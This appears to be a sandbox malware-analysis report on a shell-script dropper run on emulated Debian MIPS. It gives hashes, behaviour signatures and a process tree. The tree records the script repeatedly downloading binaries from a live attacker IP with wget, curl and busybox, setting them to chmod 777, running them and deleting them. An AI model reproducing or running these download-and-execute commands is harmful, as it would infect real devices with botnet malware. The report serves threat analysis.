Analysis
-
max time kernel
134s -
max time network
139s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
21/11/2024, 04:06
Static task
static1
Behavioral task
behavioral1
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
-
Size
10KB
-
MD5
2c8ee73ff481383ca124810fef8653b1
-
SHA1
2f0045a1346635e0b97b189a217d60329572ee9c
-
SHA256
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94
-
SHA512
a4cf9a0c5f3fcb4bbc802490023c07e2cdfe73a8a6d3d4903e7e952967325270f6f4a0bf912b58844b8655e30ba7832a39dc377a73ed4443b77740b6584ad8ad
-
SSDEEP
192:mrPM5ZTjn81dBLvdLvgaD6DGDN2uVFxFxFcj/flNzu7ui07gQ27wgRNKW5z7MUzm:jiC2N2uKu4OxTHC2N2uwCo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh/tmp/2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh1⤵PID:707
-
/bin/rm/bin/rm bins.sh2⤵PID:712
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:715
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:721
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:731
-
-
/bin/chmodchmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:737
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:739
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:742
-
-
/bin/chmodchmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:745
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:746
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:747
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:748
-
-
/bin/chmodchmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:751
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:752
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:759
-
-
/bin/chmodchmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- File and Directory Permissions Modification
PID:762
-
-
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Executes dropped EXE
PID:763
-
-
/bin/rmrm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:766
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:767
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:772
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:779
-
-
/bin/chmodchmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- File and Directory Permissions Modification
PID:782
-
-
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Executes dropped EXE
PID:783
-
-
/bin/rmrm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:786
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:787
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:792
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:801
-
-
/bin/chmodchmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:810
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:811
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:820
-
-
/bin/chmodchmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:823
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:824
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:826
-
-
/bin/chmodchmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Executes dropped EXE
PID:828
-
-
/bin/rmrm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:829
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:830
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:831
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:832
-
-
/bin/chmodchmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Executes dropped EXE
PID:834
-
-
/bin/rmrm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:835
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:836
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:844
-
-
/bin/chmodchmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:851
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:852
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:868
-
-
/bin/chmodchmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:880
-
-
/bin/chmodchmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:883
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:884
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:886
-
-
/bin/chmodchmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:889
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:890
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:892
-
-
/bin/chmodchmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:895
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:896
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:898
-
-
/bin/chmodchmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:901
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:902
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:904
-
-
/bin/chmodchmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:907
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:908
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:910
-
-
/bin/chmodchmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:913
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:914
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:916
-
-
/bin/chmodchmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:919
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:920
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:922
-
-
/bin/chmodchmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:925
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:928
-
-
/bin/chmodchmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:931
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:932
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:934
-
-
/bin/chmodchmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:937
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:940
-
-
/bin/chmodchmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:946
-
-
/bin/chmodchmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:949
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:950
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:952
-
-
/bin/chmodchmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:958
-
-
/bin/chmodchmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:964
-
-
/bin/chmodchmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:967
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:968
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:970
-
-
/bin/chmodchmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:973
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:974
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:976
-
-
/bin/chmodchmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:979
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97